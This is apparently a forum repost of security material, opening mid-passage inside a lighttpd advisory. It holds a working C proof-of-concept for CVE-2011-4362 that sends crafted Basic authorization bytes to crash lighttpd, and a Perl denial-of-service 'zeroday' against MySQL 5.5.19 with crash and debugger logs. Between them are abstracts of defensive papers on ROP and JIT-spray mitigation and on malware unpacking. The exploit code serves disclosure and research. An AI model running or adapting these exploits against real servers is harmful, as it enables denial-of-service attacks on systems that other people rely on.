31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF * }; * * static unsigned char * base64_decode(buffer *out, const char *in) { * ... * int ch, ...; * size_t i; * ... * * ch = in[i]; * ... * ch = base64_reverse_table[ch]; * ... * } * --- CUT --- * * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices. * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata * section before the base64_reverse_table table cause this situation. * * I have added some extra debug in the lighttpd source code to see if this vulnerability is * executed correctly. Here is output for one of the example: * * --- CUT --- * ptr[0x9a92c48] size[0xc0] used[0x0] * 127(. | 0 | 0) * -128(t | 1 | 0) * -127(e | 2 | 1) * -126(' | 3 | 2) * -125(e | 4 | 3) * -124(u | 5 | 3) * -123(r | 6 | 4) * -122(' | 7 | 5) * -121(s | 8 | 6) * -120(c | 9 | 6) * -119(i | 10 | 7) * -118(n | 11 | 8) * -117(i | 12 | 9) * -116( | 13 | 9) * -115(a | 14 | 10) * -114(t | 15 | 11) * -113(. | 16 | 12) * -112(e | 17 | 12) * -111(u | 18 | 13) * -110(r | 19 | 14) * -109(' | 20 | 15) * -108(f | 21 | 15) * -107(i | 22 | 16) * -106(e | 23 | 17) * -105(: | 24 | 18) * -104(= | 25 | 18) * -103(o | 26 | 19) * -102(t | 27 | 20) * -101(o | 28 | 21) * -100( | 29 | 21) * -99(a | 30 | 22) * -98(g | 31 | 23) * -97(. | 32 | 24) * -96(d | 33 | 24) * -95(g | 34 | 25) * -94(s | 35 | 26) * -93(: | 36 | 27) * -92(u | 37 | 27) * -91(s | 38 | 28) * -90(p | 39 | 29) * -89(o | 40 | 30) * -88(t | 41 | 30) * -87(d | 42 | 31) * -86(b | 43 | 32) * -85(c | 44 | 33) * -84(e | 45 | 33) * -83(d | 46 | 34) * -82(( | 47 | 35) * -81(n | 48 | 36) * -80(y | 49 | 36) * -79(h | 50 | 37) * -78(d | 51 | 38) * -77(g | 52 | 39) * -76(s | 53 | 39) * -75( | 54 | 40) * -74(r | 55 | 41) * -73(p | 56 | 42) * -72(a | 57 | 42) * -71(n | 58 | 43) * -70(. | 59 | 44) * -69(. | 60 | 45) * -68(d | 61 | 45) * -67(g | 62 | 46) * -66(s | 63 | 47) * -65(: | 64 | 48) * -64(( | 65 | 48) * -63(d | 66 | 49) * -62(- | 67 | 50) * -61(e | 68 | 51) * -60(s | 69 | 51) * -59( | 70 | 52) * -58(i | 71 | 53) * -57(s | 72 | 54) * -56(n | 73 | 54) * -55( | 74 | 55) * -54(i | 75 | 56) * -53(l | 76 | 57) * -52(. | 77 | 57) * -51(. | 78 | 58) * -50(k | 79 | 59) * -49(0 | 80 | 60) * -48(% | 81 | 60) * -47(] | 82 | 61) * -46(p | 83 | 62) * -45(r | 84 | 63) * -44(0 | 85 | 63) * -43(% | 86 | 64) * -42(] | 87 | 65) * -41(s | 88 | 66) * -40(z | 89 | 66) * -39([ | 90 | 67) * -38(x | 91 | 68) * -37(x | 92 | 69) * -36( | 93 | 69) * -35(s | 94 | 70) * -34(d | 95 | 71) * -33(0 | 96 | 72) * -32(% | 97 | 72) * -31(] | 98 | 73) * -30(. | 99 | 74) * -29(. | 100 | 75) * -28(d | 101 | 75) * -27(c | 102 | 76) * -26(d | 103 | 77) * -25(i | 104 | 78) * -24(g | 105 | 78) * -23(b | 106 | 79) * -22(s | 107 | 80) * -21(6 | 108 | 81) * -20(- | 109 | 81) * -19(t | 110 | 82) * -18(i | 111 | 83) * -17(g | 112 | 84) * -16(f | 113 | 84) * -15(i | 114 | 85) * -14(e | 115 | 86) * -13(. | 116 | 87) * -12(. | 117 | 87) * -11(. | 118 | 88) * -10(. | 119 | 89) * -9(. | 120 | 90) * -8(. | 121 | 90) * -7(. | 122 | 91) * -6(. | 123 | 92) * -5(. | 124 | 93) * -4(. | 125 | 93) * -3(. | 126 | 94) * -2(. | 127 | 95) * -1(. | 128 | 96) * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0] * ptr[0x9a92c48] size[0xc0] used[0x60] * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.] * --- CUT --- * * First column is the offset so vulnerability is executed like it should be * (negative offsets). Second column is byte which is read out-of-bound. * * * Maybe you can find vulnerable binary? * * * Best regards, * Adam 'pi3' Zabrocki * * * -- * http://pi3.com.pl * http://site.pi3.com.pl/exp/p_cve-2011-4362.c * http://blog.pi3.com.pl/?p=277 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <getopt.h> #define PORT 80 #define SA struct sockaddr char header[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; char header_port[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s:%d\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; int main(int argc, char *argv[]) { int i=PORT,opt=0,sockfd; char *remote_dir = NULL; char *r_hostname = NULL; struct sockaddr_in servaddr; struct hostent *h = NULL; char *buf; unsigned int len = 0x0; if (!argv[1]) usage(argv[0]); printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\t\t[+] Preparing arguments... "); while((opt = getopt(argc,argv,"h:d:p:?")) != -1) { switch(opt) { case 'h': r_hostname = strdup(optarg); if ( (h = gethostbyname(r_hostname))==NULL) { printf("Gethostbyname() field!\n"); exit(-1); } break; case 'p': i=atoi(optarg); break; case 'd': remote_dir = strdup(optarg); break; case '?': usage(argv[0]); break; default: usage(argv[0]); break; } } if (!remote_dir || !h) { usage(argv[0]); exit(-1); } servaddr.sin_family = AF_INET; servaddr.sin_port = htons(i); servaddr.sin_addr = *(struct in_addr*)h->h_addr; len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512; if ( (buf = (char *)malloc(len)) == NULL) { printf("malloc() \n"); exit(-1); } memset(buf,0x0,len); if (i != 80) snprintf(buf,len,header_port,remote_dir,r_hostname,i); else snprintf(buf,len,header,remote_dir,r_hostname); for (i=0;i<130;i++) buf[strlen(buf)] = 127+i; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; printf("OK\n\t\t[+] Creating socket... "); if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) { printf("Socket() error!\n"); exit(-1); } printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname); if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) { printf("Connect() error!\n"); exit(-1); } printf("OK\n\t\t[+] Sending dirty packet... "); // write(1,buf,strlen(buf)); write(sockfd,buf,strlen(buf)); printf("OK\n\n\t\t[+] Check the website!\n\n"); close(sockfd); } int usage(char *arg) { printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg); printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n"); exit(0); } Sursa: Lighttpd Proof of Concept code for CVE-2011-4362 : pi3 blog

[h=3]Mitigating Return-Oriented Programing Attacks and Other Exploitation Attempts via Secure API Execution[/h]Abstract With the discovery of new exploit techniques, new protection mechanisms are needed as well. Mit- igations like DEP (Data Execution Prevention) or ASLR (Address Space Layout Randomization) created a significantly more difficult environment for vulnerability exploitation. Attackers, however, have recently developed new exploitation methods which are capable of bypassing the operating sys- tem’s security protection mechanisms. Currently Return-Oriented Programming at- tacks are used heavily for the exploitation purposes. In order to protect against such attacks, we have developed a solution which decreases the probabil- ity of successful exploitation by the attacker. We are able to achieve this goal by estimating and lim- iting the places from where selected (protected) API functions can be referenced. Our solution does not require program source code and can be imple- mented for both user mode and kernel mode pro- grams. Currently the prototype works on IA-32 compatible processors. Our solution decreases the possibility of suc- cessful vulnerability exploitation without notice- able performance impact and false-positive alerts. Our work is not only limited to Return-Oriented Programming attacks. It can also harden shellcode execution and other exploitation methods as well. Download: http://piotrbania.com/all/articles/pbania-secure-api2011.pdf

[h=3]JIT spraying and mitigations[/h] ABSTRACT: With the discovery of new exploit techniques, novel protection mechanisms are needed as well. Mitigations like DEP (Data Execution Prevention) or ASLR (Address Space Layout Randomization) created a significantly more difficult environment for exploitation. Attackers, however, have recently researched new exploitation methods which are capable of bypassing the operating system’s memory mitigations. One of the newest and most popular exploitation techniques to bypass both of the aforementioned security protections is JIT memory spraying, introduced by Dion Blazakis. In this article we will present a short overview of the JIT spraying technique and also novel mitigation methods against this innovative class of attacks. An anti-JIT spraying library was created as part of our shellcode execution prevention system. DOWNLOAD HERE MIRROR: LOCAL MIRROR PS. You can catch me on twitter (http://twitter.com/PiotrBania) -- however i'm mostly tweeting only about midget car racing. Sursa: Piotr Bania Chronicles http://blog.piotrbania.com: PAPER: JIT spraying and mitigations

Generic Unpacking of Self-mo difying, Aggressive, Packed Binary Programs Piotr Bania bania.piotr@gmail.com March 2009 Abstract Nowadays most of the malware applications are ei- ther packed or protected. This techniques are ap- plied esp ecially to evade signature based detectors and also to complicate the job of reverse engineers or security analysts. The time one must sp end on unpacking or decrypting malware layers is of- ten very long and in fact remains the most compli- cated task in the overall pro cess of malware anal- ysis. In this rep ort author prop oses MmmBop as a relatively new concept of using dynamic binary instrumentation techniques for unpacking and by- passing detection by self-mo difying and highly ag- gressive packed binary co de. MmmBop is able to deal with most of the known and unknown pack- ing algorithms and it is also suitable to successfully bypass most of currently used anti-reversing tricks. This framework do es not dep end on any other 3rd party software and it is develop ed entirely in user mo de (ring3). MmmBop supp orts the IA-32 archi- tecture and it is targeted for Microsoft Windows XP, some of the further delib erations will b e refer- ring directly to this op erating system. Download: http://piotrbania.com/all/articles/pbania-dbi-unpacking2009.pdf

MySQL Denial of Service Zeroday PoC From: king cope <isowarez.isowarez.isowarez () googlemail com> Date: Sat, 1 Dec 2012 22:26:16 +0100 (see attachment) Kingcope Attachment: mysql-dos.txt 5.5.19-log on SuSE Linux DoS exploit: -------------------------------------------------------------------------------------------------------- use Net::MySQL; use Unicode::UTF8 qw[decode_utf8 encode_utf8]; $|=1; my $mysql = Net::MySQL->new( hostname => '192.168.2.3', # Default use UNIX socket database => 'test', user => "monty", password => "python", debug => 1, ); $mysql->_execute_command("\x12", "\x00\x00\x00\x00 foo"); exit; for ($k=0;$k<50000;$k++) { $a .="<A$k>"; } for ($k=0;$k<50000;$k++) { $a .="</A$k>"; } # SELECT example $mysql->query("SELECT UpdateXML('<a>$a<b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1"); my $record_set = $mysql->create_record_iterator; while (my $record = $record_set->each) { printf "First column: %s Next column: %s\n", $record->[0], $record->[1]; } $mysql->close; Crash Log: -------------------------------------------------------------------------------------------------------- started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2 & 120108 12:55:28 - mysqld got signal 11 ; This could be because you hit a bug. It is also possible that this binary or one of the libraries it was linked against is corrupt, improperly built, or misconfigured. This error can also be caused by malfunctioning hardware. We will try our best to scrape up some info that will hopefully help diagnose the problem, but since we have already crashed, something is definitely wrong and this may fail. key_buffer_size=16777216 read_buffer_size=262144 max_used_connections=1 max_threads=151 thread_count=1 connection_count=1 It is possible that mysqld could use up to key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory Hope that's ok; if not, decrease some variables in the equation. Thread pointer: 0x8e6fa48 Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong... stack_bottom = 0xa868b35c thread_stack 0x30000 /usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63] /usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c] [0xffffe400] /usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4] /usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac] /usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63] /usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc] /lib/libpthread.so.0(+0x5b05)[0xb771cb05] /lib/libc.so.6(clone+0x5e)[0xb74e7d5e] Trying to get some variables. Some pointers may be invalid and cause the dump to abort. Query ((nil)): is an invalid pointer Connection ID (thread ID): 12 Status: NOT_KILLED The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains information that should help you find out what is causing the crash. Version: '5.5.19-log' socket: '/var/run/mysql/mysql.sock' port: 3306 Source distribution [New Thread 0xa8f1db70 (LWP 7907)] 120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known 120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xa8f1db70 (LWP 7907)] mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 "", pos=<value optimized out>, flags=65535) at /root/mysql-5.5.19/sql/sql_repl.cc:1043 1043 log_file_name, (llstr(my_b_tell(&log), llbuff2), llbuff2)); (gdb) x/10i $eip => 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370>: mov 0x8(%ecx),%edx 0x81bf54d <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373>: mov 0x4(%ecx),%eax 0x81bf550 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376>: mov %edx,0x4(%esp) 0x81bf554 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380>: mov %eax,(%esp) 0x81bf557 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383>: call 0x8541560 <llstr> 0x81bf55c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388>: mov -0x9b0(%ebp),%edx 0x81bf562 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394>: lea -0x590(%ebp),%eax 0x81bf568 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400>: mov %edi,0x1c(%esp) 0x81bf56c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404>: lea -0x990(%ebp),%edi 0x81bf572 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410>: mov %eax,0x18(%esp) (gdb) i r eax 0xa8f1c804 -1460549628 ecx 0x0 0 edx 0xa8f1c805 -1460549627 ebx 0x8e821e0 149430752 esp 0xa8f1be50 0xa8f1be50 ebp 0xa8f1c868 0xa8f1c868 esi 0xa8f1c81a -1460549606 edi 0xa8f1c804 -1460549628 eip 0x81bf54a 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370> eflags 0x210282 [ SF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 unprivileged user (REPLICATION_SLAVE privs needed to trigger the bug): -------------------------------------------------------------------------------------------------------- C:\Users\kingcope\Desktop>perl mysql.pl Use INET Socket: 192.168.2.3 3306/tcp Net::MySQL::_get_server_information(): 4E 00 00 00 0A 35 2E 35 2E 31 39 2D 6C 6F 67 00 N....5.5.19-log. 01 00 00 00 59 4C 50 2C 29 28 2E 4F 00 FF F7 08 ....YLP,)(.O.... 02 00 0F 80 15 00 00 00 00 00 00 00 00 00 00 22 ................ 59 7C 24 3A 36 40 21 22 26 38 29 00 6D 79 73 71 Y...6....8).mysq 6C 5F 6E 61 74 69 76 65 5F 70 61 73 73 77 6F 72 l_native_passwor 64 00 d. Protocol Version: 10 Server Version: 5.5.19-log Salt: YLP,)(.O"Y|$:6 () !"&8) Net::MySQL::_send_login_message(): 41 00 00 01 0D A6 03 00 00 00 00 01 21 00 00 00 A............... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 6D 6F 6E 74 79 32 00 14 21 2F FB 64 ....monty2.....d 27 B4 FE 26 89 F7 D6 E7 2A A1 C9 00 A9 CF 4E 51 '.......*.....NQ 74 65 73 74 00 test. Net::MySQL::_request_authentication(): 07 00 00 02 00 00 00 02 00 00 00 ........... connect database Net::MySQL::_execute_command(): 0A 00 00 00 12 00 00 00 00 00 00 FF 00 00 .............. Net::MySQL::_execute_command(): 68 00 00 01 FF CB 04 23 34 32 30 30 30 41 63 63 h.......42000Acc 65 73 73 20 64 65 6E 69 65 64 3B 20 79 6F 75 20 ess.denied;.you. 6E 65 65 64 20 28 61 74 20 6C 65 61 73 74 20 6F need.(at.least.o 6E 65 20 6F 66 29 20 74 68 65 20 52 45 50 4C 49 ne.of).the.REPLI 43 41 54 49 4F 4E 20 53 4C 41 56 45 20 70 72 69 CATION.SLAVE.pri 76 69 6C 65 67 65 28 73 29 20 66 6F 72 20 74 68 vilege(s).for.th 69 73 20 6F 70 65 72 61 74 69 6F 6E is.operation Sursa: Full Disclosure: MySQL Denial of Service Zeroday PoC